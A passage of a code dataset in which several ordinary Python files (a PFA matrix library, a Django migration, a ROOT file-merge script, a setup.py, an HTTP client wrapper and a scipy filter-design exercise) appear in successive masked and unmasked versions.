sum(x[i][i] for i in keys)\n\nprovide(Trace())\n\nclass Det(LibFcn):\n name = prefix + \"det\"\n sig = Sigs([Sig([{\"x\": P.Array(P.Array(P.Double()))}], P.Double()),\n Sig([{\"x\": P.Map(P.Map(P.Double()))}], P.Double())])\n errcodeBase = 24090\n def __call__(self, state, scope, pos, paramTypes, x):\n if isinstance(x, (list, tuple)) and all(isinstance(xi, (list, tuple)) for xi in x):\n rows = len(x)\n if rows < 1:\n raise PFARuntimeException(\"too few rows/cols\", self.errcodeBase + 0, self.name, pos)\n cols = len(x[0])\n if cols < 1:\n raise PFARuntimeException(\"too few rows/cols\", self.errcodeBase + 0, self.name, pos)\n if raggedArray(x):\n raise PFARuntimeException(\"ragged columns\", self.errcodeBase + 1, self.name, pos)\n if rows != cols:\n raise PFARuntimeException(\"non-square matrix\", self.errcodeBase + 2, self.name, pos)\n if any(any(math.isnan(z) or math.isinf(z) for z in row) for row in x):\n return float(\"nan\")\n else:\n return float(np().linalg.det(arraysToMatrix(x)))\n\n elif isinstance(x, dict) and all(isinstance(x[i], dict) for i in list(x.keys())):\n keys = list(rowKeys(x).union(colKeys(x)))\n if len(keys) < 1 or all(len(row) == 0 for row in list(x.values())):\n raise PFARuntimeException(\"too few rows/cols\", self.errcodeBase + 0, self.name, pos)\n if any(any(math.isnan(z) or math.isinf(z) for z in list(row.values())) for row in list(x.values())):\n return float(\"nan\")\n else:\n return float(np().linalg.det(mapsToMatrix(x, keys, keys)))\n\nprovide(Det())\n\nclass Symmetric(LibFcn):\n name = prefix + \"symmetric\"\n sig = Sigs([Sig([{\"x\": P.Array(P.Array(P.Double()))}, {\"tol\": P.Double()}], P.Boolean()),\n Sig([{\"x\": P.Map(P.Map(P.Double()))}, {\"tol\": P.Double()}], P.Boolean())])\n errcodeBase = 24100\n @staticmethod\n def same(x, y, tol):\n if math.isinf(x) and math.isinf(y) and ((x > 0.0 and y > 0.0) or (x < 0.0 and y < 0.0)):\n return True\n elif math.isnan(x) and math.isnan(y):\n return True\n elif not math.isinf(x) and not math.isnan(x) and not math.isinf(y) and not math.isnan(y):\n return abs(x - y) < tol\n else:\n return False\n def __call__(self, state, scope, pos, paramTypes, x, tol):\n if isinstance(x, (list, tuple)) and all(isinstance(xi, (list, tuple)) for xi in x):\n rows = len(x)\n if rows < 1:\n raise PFARuntimeException(\"too few rows/cols\", self.errcodeBase + 0, self.name, pos)\n cols = len(x[0])\n if cols < 1:\n raise PFARuntimeException(\"too few rows/cols\", self.errcodeBase + 0, self.name, pos)\n if raggedArray(x):\n raise PFARuntimeException(\"ragged columns\", self.errcodeBase + 1, self.name, pos)\n if rows != cols:\n raise PFARuntimeException(\"non-square matrix\", self.errcodeBase + 2, self.name, pos)\n return all(all(self.same(x[i][j], x[j][i], tol) for j in range(cols)) for i in range(rows))\n\n elif isinstance(x, dict) and all(isinstance(x[i], dict) for i in list(x.keys())):\n keys = list(rowKeys(x).union(colKeys(x)))\n if len(keys) < 1 or all(len(row) == 0 for row in list(x.values())):\n raise PFARuntimeException(\"too few rows/cols\", self.errcodeBase + 0, self.name, pos)\n return all(all(self.same(x.get(i, {}).get(j, 0.0), x.get(j, {}).get(i, 0.0), tol) for j in keys) for i in keys)\n\nprovide(Symmetric())\n\nclass EigenBasis(LibFcn):\n name = prefix + \"eigenBasis\"\n sig = Sigs([Sig([{\"x\": P.Array(P.Array(P.Double()))}], P.Array(P.Array(P.Double()))),\n Sig([{\"x\": P.Map(P.Map(P.Double()))}], P.Map(P.Map(P.Double())))])\n\n errcodeBase = 24110\n def calculate(self, x, size):\n symm = (x + x.T) * 0.5\n\n evals, evects = np().linalg.eig(symm)\n evects = np().array(evects)\n evects2 = [evects[:,i] * (-1.0 if evects[0,i] < 0.0 else 1.0) for i in range(size)]\n\n eigvalm2 = [div(1.0, math.sqrt(abs(ei))) for ei in evals]\n order = np().argsort(eigvalm2)\n\n out = np().empty((size, size), dtype=np().double)\n for i in range(size):\n for j in range(size):\n out[i,j] = evects2[order[i]][j] * eigvalm2[order[i]]\n return out\n\n def __call__(self, state, scope, pos, paramTypes, x):\n if isinstance(x, (list, tuple)) and all(isinstance(xi, (list, tuple)) for xi in x):\n rows = len(x)\n if rows < 1:\n raise PFARuntimeException(\"too few rows/cols\", self.errcodeBase + 0, self.name, pos)\n cols = len(x[0])\n if cols < 1:\n raise PFARuntimeException(\"too few rows/cols\", self.errcodeBase + 0, self.name, pos)\n if raggedArray(x):\n raise PFARuntimeException(\"ragged columns\", self.errcodeBase + 1, self.name, pos)\n if rows != cols:\n raise PFARuntimeException(\"non-square matrix\", self.errcodeBase + 2, self.name, pos)\n if any(any(math.isnan(z) or math.isinf(z) for z in row) for row in x):\n raise PFARuntimeException(\"non-finite matrix\", self.errcodeBase + 3, self.name, pos)\n return matrixToArrays(self.calculate(arraysToMatrix(x), rows))\n\n elif isinstance(x, dict) and all(isinstance(x[i], dict) for i in list(x.keys())):\n keys = list(rowKeys(x).union(colKeys(x)))\n if len(keys) < 1 or all(len(z) == 0 for z in list(x.values())):\n raise PFARuntimeException(\"too few rows/cols\", self.errcodeBase + 0, self.name, pos)\n if any(any(math.isnan(z) or math.isinf(z) for z in list(row.values())) for row in list(x.values())):\n raise PFARuntimeException(\"non-finite matrix\", self.errcodeBase + 3, self.name, pos)\n return matrixToMaps(self.calculate(mapsToMatrix(x, keys, keys), len(keys)), list(map(str, range(len(keys)))), keys)\n\nprovide(EigenBasis())\n\nclass Truncate(LibFcn):\n name = prefix + \"truncate\"\n sig = Sigs([Sig([{\"x\": P.Array(P.Array(P.Double()))}, {\"keep\": P.Int()}], P.Array(P.Array(P.Double()))),\n Sig([{\"x\": P.Map(P.Map(P.Double()))}, {\"keep\": P.Array(P.String())}], P.Map(P.Map(P.Double())))])\n errcodeBase = 24120\n def __call__(self, state, scope, pos, paramTypes, x, keep):\n if isinstance(keep, int) and keep < 0:\n keep = 0\n\n if isinstance(x, (list, tuple)) and all(isinstance(xi, (list, tuple)) for xi in x):\n rows = len(x)\n if rows < 1:\n raise PFARuntimeException(\"too few rows/cols\", self.errcodeBase + 0, self.name, pos)\n cols = len(x[0])\n if cols < 1:\n raise PFARuntimeException(\"too few rows/cols\", self.errcodeBase + 0, self.name, pos)\n if raggedArray(x):\n raise PFARuntimeException(\"ragged columns\", self.errcodeBase + 1, self.name, pos)\n return x[:keep]\n\n elif isinstance(x, dict) and all(isinstance(x[i], dict) for i in list(x.keys())):\n rows = rowKeys(x)\n cols = colKeys(x)\n if len(rows) < 1 or len(cols) < 1:\n raise PFARuntimeException(\"too few rows/cols\", self.errcodeBase + 0, self.name, pos)\n return dict((k, x[k]) for k in rows if k in keep)\n\nprovide(Truncate())\n",
"step-ids": [
26,
42,
47,
53,
59
]
}
|
[
26,
42,
47,
53,
59
] |
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class Migration(migrations.Migration):
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class Migration(migrations.Migration):
dependencies = [('users', '0003_delete_userprofile')]
operations = [migrations.CreateModel(name='Subscription', fields=[('id',
models.AutoField(auto_created=True, primary_key=True, serialize=
False, verbose_name='ID')), ('email', models.EmailField(max_length=
255)), ('subscribe_to', models.CharField(choices=[('jobs', 'Jobs'),
('posts', 'Posts'), ('newsletter', 'Newsletter')], max_length=100)),
('department', modelcluster.fields.ParentalKey(null=True, on_delete
=django.db.models.deletion.CASCADE, related_name=
'department_subscriptions', to='users.Department'))], options={
'verbose_name': 'Subscription', 'verbose_name_plural':
'Subscriptions'})]
<|reserved_special_token_1|>
from django.db import migrations, models
import django.db.models.deletion
import modelcluster.fields
class Migration(migrations.Migration):
dependencies = [('users', '0003_delete_userprofile')]
operations = [migrations.CreateModel(name='Subscription', fields=[('id',
models.AutoField(auto_created=True, primary_key=True, serialize=
False, verbose_name='ID')), ('email', models.EmailField(max_length=
255)), ('subscribe_to', models.CharField(choices=[('jobs', 'Jobs'),
('posts', 'Posts'), ('newsletter', 'Newsletter')], max_length=100)),
('department', modelcluster.fields.ParentalKey(null=True, on_delete
=django.db.models.deletion.CASCADE, related_name=
'department_subscriptions', to='users.Department'))], options={
'verbose_name': 'Subscription', 'verbose_name_plural':
'Subscriptions'})]
<|reserved_special_token_1|>
# Generated by Django 2.2.2 on 2019-07-17 10:02
from django.db import migrations, models
import django.db.models.deletion
import modelcluster.fields
class Migration(migrations.Migration):
dependencies = [
('users', '0003_delete_userprofile'),
]
operations = [
migrations.CreateModel(
name='Subscription',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('email', models.EmailField(max_length=255)),
('subscribe_to', models.CharField(choices=[('jobs', 'Jobs'), ('posts', 'Posts'), ('newsletter', 'Newsletter')], max_length=100)),
('department', modelcluster.fields.ParentalKey(null=True, on_delete=django.db.models.deletion.CASCADE, related_name='department_subscriptions', to='users.Department')),
],
options={
'verbose_name': 'Subscription',
'verbose_name_plural': 'Subscriptions',
},
),
]
|
flexible
|
{
"blob_id": "cf2c57dbb2c1160321bcd6de98691db48634d5d6",
"index": 5388,
"step-1": "<mask token>\n",
"step-2": "<mask token>\n\n\nclass Migration(migrations.Migration):\n <mask token>\n <mask token>\n",
"step-3": "<mask token>\n\n\nclass Migration(migrations.Migration):\n dependencies = [('users', '0003_delete_userprofile')]\n operations = [migrations.CreateModel(name='Subscription', fields=[('id',\n models.AutoField(auto_created=True, primary_key=True, serialize=\n False, verbose_name='ID')), ('email', models.EmailField(max_length=\n 255)), ('subscribe_to', models.CharField(choices=[('jobs', 'Jobs'),\n ('posts', 'Posts'), ('newsletter', 'Newsletter')], max_length=100)),\n ('department', modelcluster.fields.ParentalKey(null=True, on_delete\n =django.db.models.deletion.CASCADE, related_name=\n 'department_subscriptions', to='users.Department'))], options={\n 'verbose_name': 'Subscription', 'verbose_name_plural':\n 'Subscriptions'})]\n",
"step-4": "from django.db import migrations, models\nimport django.db.models.deletion\nimport modelcluster.fields\n\n\nclass Migration(migrations.Migration):\n dependencies = [('users', '0003_delete_userprofile')]\n operations = [migrations.CreateModel(name='Subscription', fields=[('id',\n models.AutoField(auto_created=True, primary_key=True, serialize=\n False, verbose_name='ID')), ('email', models.EmailField(max_length=\n 255)), ('subscribe_to', models.CharField(choices=[('jobs', 'Jobs'),\n ('posts', 'Posts'), ('newsletter', 'Newsletter')], max_length=100)),\n ('department', modelcluster.fields.ParentalKey(null=True, on_delete\n =django.db.models.deletion.CASCADE, related_name=\n 'department_subscriptions', to='users.Department'))], options={\n 'verbose_name': 'Subscription', 'verbose_name_plural':\n 'Subscriptions'})]\n",
"step-5": "# Generated by Django 2.2.2 on 2019-07-17 10:02\n\nfrom django.db import migrations, models\nimport django.db.models.deletion\nimport modelcluster.fields\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('users', '0003_delete_userprofile'),\n ]\n\n operations = [\n migrations.CreateModel(\n name='Subscription',\n fields=[\n ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),\n ('email', models.EmailField(max_length=255)),\n ('subscribe_to', models.CharField(choices=[('jobs', 'Jobs'), ('posts', 'Posts'), ('newsletter', 'Newsletter')], max_length=100)),\n ('department', modelcluster.fields.ParentalKey(null=True, on_delete=django.db.models.deletion.CASCADE, related_name='department_subscriptions', to='users.Department')),\n ],\n options={\n 'verbose_name': 'Subscription',\n 'verbose_name_plural': 'Subscriptions',\n },\n ),\n ]\n",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
# Stubs for torch.nn.utils (Python 3)
#
# NOTE: This dynamically typed stub was automatically generated by stubgen.
from .clip_grad import clip_grad_norm, clip_grad_norm_, clip_grad_value_
from .convert_parameters import parameters_to_vector, vector_to_parameters
from .spectral_norm import remove_spectral_norm, spectral_norm
from .weight_norm import remove_weight_norm, weight_norm
|
normal
|
{
"blob_id": "5d9ace3b6c5b4e24fc3b20b5e5640f2fcdb252bb",
"index": 9292,
"step-1": "<mask token>\n",
"step-2": "from .clip_grad import clip_grad_norm, clip_grad_norm_, clip_grad_value_\nfrom .convert_parameters import parameters_to_vector, vector_to_parameters\nfrom .spectral_norm import remove_spectral_norm, spectral_norm\nfrom .weight_norm import remove_weight_norm, weight_norm\n",
"step-3": "# Stubs for torch.nn.utils (Python 3)\n#\n# NOTE: This dynamically typed stub was automatically generated by stubgen.\n\nfrom .clip_grad import clip_grad_norm, clip_grad_norm_, clip_grad_value_\nfrom .convert_parameters import parameters_to_vector, vector_to_parameters\nfrom .spectral_norm import remove_spectral_norm, spectral_norm\nfrom .weight_norm import remove_weight_norm, weight_norm\n",
"step-4": null,
"step-5": null,
"step-ids": [
0,
1,
2
]
}
|
[
0,
1,
2
] |
#!/usr/bin/env python
from ROOT import TFileMerger
import subprocess
def MergeFiles(output, fileList, skipList=[], acceptList=[], n=20):
merger = TFileMerger(False)
merger.OutputFile(output);
merger.SetMaxOpenedFiles(n);
print "Total number of files is {0}".format(len(fileList))
for fileName in fileList:
print "Adding file {0}".format(fileName)
merger.AddFile(fileName)
mode = TFileMerger.kAllIncremental
if len(skipList) > 0:
mode = mode | TFileMerger.kSkipListed
if (len(acceptList) > 0):
print("Accept list is being ignored!!!")
for skipObject in skipList:
merger.AddObjectNames(skipObject)
elif len(acceptList) > 0:
mode = mode | TFileMerger.kAcceptListed
for acceptObject in acceptList:
merger.AddObjectNames(acceptObject)
merger.PrintFiles("");
r = merger.PartialMerge(mode);
if not r:
print "Merge error!"
return r
def MergeFilesHadd(output, fileList, n=20):
cmd = ["hadd", "-n", str(n), output]
cmd.extend(fileList)
subprocess.call(cmd)
|
normal
|
{
"blob_id": "95f7710fb0137617025819b6240312ce02915328",
"index": 173,
"step-1": "#!/usr/bin/env python\n\nfrom ROOT import TFileMerger\nimport subprocess\n\ndef MergeFiles(output, fileList, skipList=[], acceptList=[], n=20):\n merger = TFileMerger(False)\n merger.OutputFile(output);\n merger.SetMaxOpenedFiles(n);\n\n print \"Total number of files is {0}\".format(len(fileList))\n \n for fileName in fileList:\n print \"Adding file {0}\".format(fileName)\n merger.AddFile(fileName)\n \n mode = TFileMerger.kAllIncremental\n\n if len(skipList) > 0:\n mode = mode | TFileMerger.kSkipListed\n if (len(acceptList) > 0):\n print(\"Accept list is being ignored!!!\")\n for skipObject in skipList:\n merger.AddObjectNames(skipObject)\n \n elif len(acceptList) > 0:\n mode = mode | TFileMerger.kAcceptListed\n for acceptObject in acceptList:\n merger.AddObjectNames(acceptObject)\n \n merger.PrintFiles(\"\");\n r = merger.PartialMerge(mode);\n\n if not r:\n print \"Merge error!\"\n\n return r\n\n\ndef MergeFilesHadd(output, fileList, n=20):\n cmd = [\"hadd\", \"-n\", str(n), output]\n cmd.extend(fileList)\n \n subprocess.call(cmd)\n",
"step-2": null,
"step-3": null,
"step-4": null,
"step-5": null,
"step-ids": [
0
]
}
|
[
0
] |
from setuptools import setup
import sys
if not sys.version_info >= (3, 6, 0):
msg = 'Unsupported version %s' % sys.version
raise Exception(msg)
def get_version(filename):
import ast
version = None
with open(filename) as f:
for line in f:
if line.startswith('__version__'):
version = ast.parse(line).body[0].value.s
break
else:
raise ValueError('No version found in %r.' % filename)
if version is None:
raise ValueError(filename)
return version
version = get_version(filename='src/zuper_nodes/__init__.py')
line = 'z5'
setup(
name=f'zuper-nodes-{line}',
version=version,
keywords='',
package_dir={'': 'src'},
packages=[
'zuper_nodes',
'zuper_nodes_tests',
'zuper_nodes_wrapper',
'zuper_nodes_wrapper_tests',
],
install_requires=[
'compmake',
'pyparsing',
'PyContracts',
'networkx<=2.2',
'termcolor',
'zuper-ipce-z5',
'cbor2',
'base58',
],
entry_points={
'console_scripts': [
'zuper-node-identify=zuper_nodes_wrapper.identify:identify_main',
],
},
)
|
normal
|
{
"blob_id": "d3b55863c6e3a1b6cbdcec37db81ee42b769938d",
"index": 9039,
"step-1": "<mask token>\n\n\ndef get_version(filename):\n import ast\n version = None\n with open(filename) as f:\n for line in f:\n if line.startswith('__version__'):\n version = ast.parse(line).body[0].value.s\n break\n else:\n raise ValueError('No version found in %r.' % filename)\n if version is None:\n raise ValueError(filename)\n return version\n\n\n<mask token>\n",
"step-2": "<mask token>\nif not sys.version_info >= (3, 6, 0):\n msg = 'Unsupported version %s' % sys.version\n raise Exception(msg)\n\n\ndef get_version(filename):\n import ast\n version = None\n with open(filename) as f:\n for line in f:\n if line.startswith('__version__'):\n version = ast.parse(line).body[0].value.s\n break\n else:\n raise ValueError('No version found in %r.' % filename)\n if version is None:\n raise ValueError(filename)\n return version\n\n\n<mask token>\nsetup(name=f'zuper-nodes-{line}', version=version, keywords='', package_dir\n ={'': 'src'}, packages=['zuper_nodes', 'zuper_nodes_tests',\n 'zuper_nodes_wrapper', 'zuper_nodes_wrapper_tests'], install_requires=[\n 'compmake', 'pyparsing', 'PyContracts', 'networkx<=2.2', 'termcolor',\n 'zuper-ipce-z5', 'cbor2', 'base58'], entry_points={'console_scripts': [\n 'zuper-node-identify=zuper_nodes_wrapper.identify:identify_main']})\n",
"step-3": "<mask token>\nif not sys.version_info >= (3, 6, 0):\n msg = 'Unsupported version %s' % sys.version\n raise Exception(msg)\n\n\ndef get_version(filename):\n import ast\n version = None\n with open(filename) as f:\n for line in f:\n if line.startswith('__version__'):\n version = ast.parse(line).body[0].value.s\n break\n else:\n raise ValueError('No version found in %r.' % filename)\n if version is None:\n raise ValueError(filename)\n return version\n\n\nversion = get_version(filename='src/zuper_nodes/__init__.py')\nline = 'z5'\nsetup(name=f'zuper-nodes-{line}', version=version, keywords='', package_dir\n ={'': 'src'}, packages=['zuper_nodes', 'zuper_nodes_tests',\n 'zuper_nodes_wrapper', 'zuper_nodes_wrapper_tests'], install_requires=[\n 'compmake', 'pyparsing', 'PyContracts', 'networkx<=2.2', 'termcolor',\n 'zuper-ipce-z5', 'cbor2', 'base58'], entry_points={'console_scripts': [\n 'zuper-node-identify=zuper_nodes_wrapper.identify:identify_main']})\n",
"step-4": "from setuptools import setup\nimport sys\nif not sys.version_info >= (3, 6, 0):\n msg = 'Unsupported version %s' % sys.version\n raise Exception(msg)\n\n\ndef get_version(filename):\n import ast\n version = None\n with open(filename) as f:\n for line in f:\n if line.startswith('__version__'):\n version = ast.parse(line).body[0].value.s\n break\n else:\n raise ValueError('No version found in %r.' % filename)\n if version is None:\n raise ValueError(filename)\n return version\n\n\nversion = get_version(filename='src/zuper_nodes/__init__.py')\nline = 'z5'\nsetup(name=f'zuper-nodes-{line}', version=version, keywords='', package_dir\n ={'': 'src'}, packages=['zuper_nodes', 'zuper_nodes_tests',\n 'zuper_nodes_wrapper', 'zuper_nodes_wrapper_tests'], install_requires=[\n 'compmake', 'pyparsing', 'PyContracts', 'networkx<=2.2', 'termcolor',\n 'zuper-ipce-z5', 'cbor2', 'base58'], entry_points={'console_scripts': [\n 'zuper-node-identify=zuper_nodes_wrapper.identify:identify_main']})\n",
"step-5": "from setuptools import setup\n\nimport sys\n\nif not sys.version_info >= (3, 6, 0):\n msg = 'Unsupported version %s' % sys.version\n raise Exception(msg)\n\n\ndef get_version(filename):\n import ast\n version = None\n with open(filename) as f:\n for line in f:\n if line.startswith('__version__'):\n version = ast.parse(line).body[0].value.s\n break\n else:\n raise ValueError('No version found in %r.' % filename)\n if version is None:\n raise ValueError(filename)\n return version\n\n\nversion = get_version(filename='src/zuper_nodes/__init__.py')\nline = 'z5'\nsetup(\n name=f'zuper-nodes-{line}',\n version=version,\n keywords='',\n package_dir={'': 'src'},\n packages=[\n 'zuper_nodes',\n 'zuper_nodes_tests',\n 'zuper_nodes_wrapper',\n 'zuper_nodes_wrapper_tests',\n ],\n install_requires=[\n 'compmake',\n 'pyparsing',\n 'PyContracts',\n 'networkx<=2.2',\n 'termcolor',\n 'zuper-ipce-z5',\n 'cbor2',\n 'base58',\n ],\n entry_points={\n 'console_scripts': [\n 'zuper-node-identify=zuper_nodes_wrapper.identify:identify_main',\n ],\n },\n)\n",
"step-ids": [
1,
2,
3,
4,
5
]
}
|
[
1,
2,
3,
4,
5
] |
import erequests
from pyarc.base import RestException
class ResultWrapper(object):
def __init__(self, client, method, url):
self.client = client
self.method = method
self.url = url
self.response = None
def get(self):
if self.response is None:
self.client.wait_all_requests_completed()
if self.response.status_code >= 400:
raise RestException(self.method,
self.url,
self.response.status_code,
self.response.text)
try:
return self.response.json()
except ValueError:
return self.response.text
_METHODS = {
'get' : erequests.async.get,
'put' : erequests.async.put,
'post' : erequests.async.post,
'delete' : erequests.async.delete
}
class ERequestsClient(object):
def __init__(self, verify = None):
self.requests_to_send = []
self.results = []
self.verify = verify or False
def start_req(self, method, prepared_url, headers, body = ''):
method = method.lower()
assert method in _METHODS, "Unknown method %s" % method
future = _METHODS[method](prepared_url,
headers = headers,
data = body,
verify = self.verify)
res = ResultWrapper(self, method, prepared_url)
self.requests_to_send.append(future)
self.results.append(res)
return res
def wait_all_requests_completed(self):
if len(self.requests_to_send) == 0:
return
try:
for resp, result in zip(erequests.map(self.requests_to_send), self.results):
result.response = resp
finally:
self.requests_to_send = []
self.results = []
|
normal
|
{
"blob_id": "4d1157b307d753abea721b93779ccc989c77d8e3",
"index": 6876,
"step-1": "import erequests\nfrom pyarc.base import RestException\n\n\nclass ResultWrapper(object):\n def __init__(self, client, method, url):\n self.client = client\n self.method = method\n self.url = url\n self.response = None\n\n def get(self):\n if self.response is None:\n self.client.wait_all_requests_completed()\n if self.response.status_code >= 400:\n raise RestException(self.method,\n self.url,\n self.response.status_code,\n self.response.text)\n try:\n return self.response.json()\n except ValueError:\n return self.response.text\n\n\n_METHODS = {\n 'get' : erequests.async.get,\n 'put' : erequests.async.put,\n 'post' : erequests.async.post,\n 'delete' : erequests.async.delete\n }\n\n\nclass ERequestsClient(object):\n def __init__(self, verify = None):\n self.requests_to_send = []\n self.results = []\n self.verify = verify or False\n\n def start_req(self, method, prepared_url, headers, body = ''):\n method = method.lower()\n assert method in _METHODS, \"Unknown method %s\" % method\n\n future = _METHODS[method](prepared_url,\n headers = headers,\n data = body,\n verify = self.verify)\n res = ResultWrapper(self, method, prepared_url)\n self.requests_to_send.append(future)\n self.results.append(res)\n return res\n\n def wait_all_requests_completed(self):\n if len(self.requests_to_send) == 0:\n return\n try:\n for resp, result in zip(erequests.map(self.requests_to_send), self.results):\n result.response = resp\n finally:\n self.requests_to_send = []\n self.results = []\n",
"step-2": null,
"step-3": null,
"step-4": null,
"step-5": null,
"step-ids": [
0
]
}
|
[
0
] |
<|reserved_special_token_0|>
<|reserved_special_token_1|>
def has23(nums):
this = nums[0] == 2 or nums[0] == 3
that = nums[1] == 2 or nums[1] == 3
return this or that
|
flexible
|
{
"blob_id": "174c4c1ed7f2197e012644999cf23f5e82f4b7c3",
"index": 3148,
"step-1": "<mask token>\n",
"step-2": "def has23(nums):\n this = nums[0] == 2 or nums[0] == 3\n that = nums[1] == 2 or nums[1] == 3\n return this or that\n",
"step-3": null,
"step-4": null,
"step-5": null,
"step-ids": [
0,
1
]
}
|
[
0,
1
] |
# -*- coding: utf-8 -*-
"""
Created on Sat May 2 21:31:37 2020
@author: Emmanuel Torres Molina
"""
"""
Ejercicio 10 del TP2 de Teoría de los Circuitos II:
Un tono de 45 KHz y 200 mV de amplitud es distorsionada por un tono de 12 KHz
y 2V de amplitud. Diseñar un filtro pasa altos que atenúe la señal
interferente, de tal forma que el remanente no sea mayor que el 2% de los 200 mV.
La ganancia en alta frecuencia deberá ser de 0 db y la máxima atenuación
en la banda de paso menor a 1 dB. Emplear la aproximación que necesite menor
número de etapas.
En este caso el Filtro está Sintetizado por un Estructura RLC Pasiva + RL Pasivo.
"""
import numpy as np
from scipy.signal import TransferFunction as transf_f
import scipy.signal as sig
from splane import bodePlot, pzmap
from matplotlib import pyplot as plt
plt.close ('all')
# ---------------------------------------------------------------------------
# ---------------------------------------------------------------------------
# Vector Tiempo:
t0 = 0.0 # Tiempo Inicial
tf = 0.005
dt = 0.00005 # Incremento
t = np.arange (t0, tf, dt)
# ---------------------------------------------------------------------------
# Tono de Interés:
f_t = 45 * 10**3 # Frecuecia del Tono de mi Interés [Hz]
w_t = 2 * np.pi * f_t # [rad/seg]
A_t = 0.2 # Amplitud de mi Tono [V]
s_t = A_t * np.sin ( w_t * t )
# ---------------------------------------------------------------------------
# Ruido Interferente:
f_r = 12 * 10**3 # Frecuencia del Ruido Interferente [Hz]
w_r = 2 * np.pi * f_r # [rad/seg]
A_r= 2 # Amplitud del Ruido [V]
r_t = A_r * np.sin ( w_r * t )
sgnal = s_t + r_t
# ---------------------------------------------------------------------------
# ---------------------------------------------------------------------------
# Valores de los Elementos del Circuito:
# Etapa 1: RLC Pasivo
R1 = 290
C1 = 3.5e-9
L1 = 3.5e-3
k1 = 1
# Etapa 2: RL Pasivo
R2 = 700
C2 = 3.5e-9
L2 = 1.03e-3
k2 = 1
# ---------------------------------------------------------------------------
# ---------------------------------------------------------------------------
# Diseño del Filtro: Vamos a Realizar un Filtro High-Pass:
# Requisitos de Plantilla
alfa_max = 0.9 # Piden que sea menor a 1dB
alfa_min = 54 # el remanente no sea mayor que el 2% de los 200 mV
wp_hp = w_t
ws_hp = w_r
# Normalizo las Pulsaciones Angulares usando como norma: wp_hp
wp_hp_norm = wp_hp / wp_hp
ws_hp_norm = ws_hp / wp_hp
w0 = np.sqrt ( 1 / (L1*C1) )
# ---------------------------------------------------------------------------
# Filtro Prototipo Low-Pass: Transformación en Frecuencia: w_HP = -1 / w_LP
wp_lp_norm = abs(-1 / wp_hp_norm)
ws_lp_norm = abs(-1 / ws_hp_norm)
# Voy a Utilizar Aproximación de Chebyshev para Diseñal el Filtro:
eps = np.sqrt ( (10 **(alfa_max/10) ) - 1 )
# Orden del Filtro
N = np.arccosh ( np.sqrt ( (10**(alfa_min/10) - 1) / eps**2 ) ) / np.arccosh (ws_lp_norm)
N = np.ceil ( N ) # Redondeo para arriba
den1_lp = [1, 0.29, 1]
den2_lp = [1, 0.7, 0.29]
p1_lp = np.roots ( den1_lp )
p2_lp = np.roots ( den2_lp )
my_z_lp = np.array ([])
my_p_lp = np.concatenate ( (p1_lp, p2_lp), axis = None )
my_k_lp = 1 * 0.29
NUM, DEN = sig.zpk2tf ( my_z_lp, my_p_lp, my_k_lp )
NUM_lp, DEN_lp = sig.lp2lp ( NUM, DEN, w0 )
my_tf_lp = transf_f (NUM_lp,DEN_lp)
# ---------------------------------------------------------------------------
# Filtro Destino - Filtro High-Pass:
# Calculo W0:
NUM_hp, DEN_hp = sig.lp2hp ( NUM, DEN, w0 )
my_tf_hp = transf_f ( NUM_hp, DEN_hp )
my_z_hp, my_p_hp, my_k_hp = sig.tf2zpk (NUM_hp, DEN_hp )
# ---------------------------------------------------------------------------
# ---------------------------------------------------------------------------
# Filtrado de la Señal:
t, s_filtrada, x = sig.lsim2 ((my_tf_hp), sgnal, t )
# ---------------------------------------------------------------------------
# ---------------------------------------------------------------------------
# Ploteo de las Señales, Respuesta en Frecuencia, etc.
fig1, axs = plt.subplots(4,1)
axs[0].plot ( t, s_t )
axs[0].grid ('True')
axs[0].set_title ('Señal Original')
axs[0].set_ylim(-0.2,0.2)
axs[0].set_ylabel('[V]')
axs[1].plot ( t, r_t )
axs[1].grid ('True')
axs[1].set_title ('Ruido Interferente')
axs[1].set_ylabel('[V]')
axs[1].set_xlim(0)
axs[2].plot (t, s_t + r_t )
axs[2].grid ('True')
axs[2].set_title ('Señal a Filtrar')
axs[2].set_ylabel('[V]')
axs[2].set_xlim(0)
axs[3].plot (t, s_filtrada )
axs[3].grid ('True')
axs[3].set_title ( 'Señal Filtrada' )
axs[3].set_xlabel ('t[seg]')
axs[3].set_ylabel('[V]')
axs[3].set_ylim(-0.2,0.2)
axs[3].set_xlim(0)
# Respuesta en Frecuencia:
bodePlot (my_tf_lp, 'Filtro Prototipo - Low Pass')
pzmap (my_tf_lp)
bodePlot (my_tf_hp, 'Filtro Destino - High Pass')
pzmap (my_tf_hp)
|
normal
|
{
"blob_id": "dd59f3b1d8b17defe4e7f30fec594d01475319d2",
"index": 6211,
"step-1": "<mask token>\n",
"step-2": "<mask token>\nplt.close('all')\n<mask token>\naxs[0].plot(t, s_t)\naxs[0].grid('True')\naxs[0].set_title('Señal Original')\naxs[0].set_ylim(-0.2, 0.2)\naxs[0].set_ylabel('[V]')\naxs[1].plot(t, r_t)\naxs[1].grid('True')\naxs[1].set_title('Ruido Interferente')\naxs[1].set_ylabel('[V]')\naxs[1].set_xlim(0)\naxs[2].plot(t, s_t + r_t)\naxs[2].grid('True')\naxs[2].set_title('Señal a Filtrar')\naxs[2].set_ylabel('[V]')\naxs[2].set_xlim(0)\naxs[3].plot(t, s_filtrada)\naxs[3].grid('True')\naxs[3].set_title('Señal Filtrada')\naxs[3].set_xlabel('t[seg]')\naxs[3].set_ylabel('[V]')\naxs[3].set_ylim(-0.2, 0.2)\naxs[3].set_xlim(0)\nbodePlot(my_tf_lp, 'Filtro Prototipo - Low Pass')\npzmap(my_tf_lp)\nbodePlot(my_tf_hp, 'Filtro Destino - High Pass')\npzmap(my_tf_hp)\n",
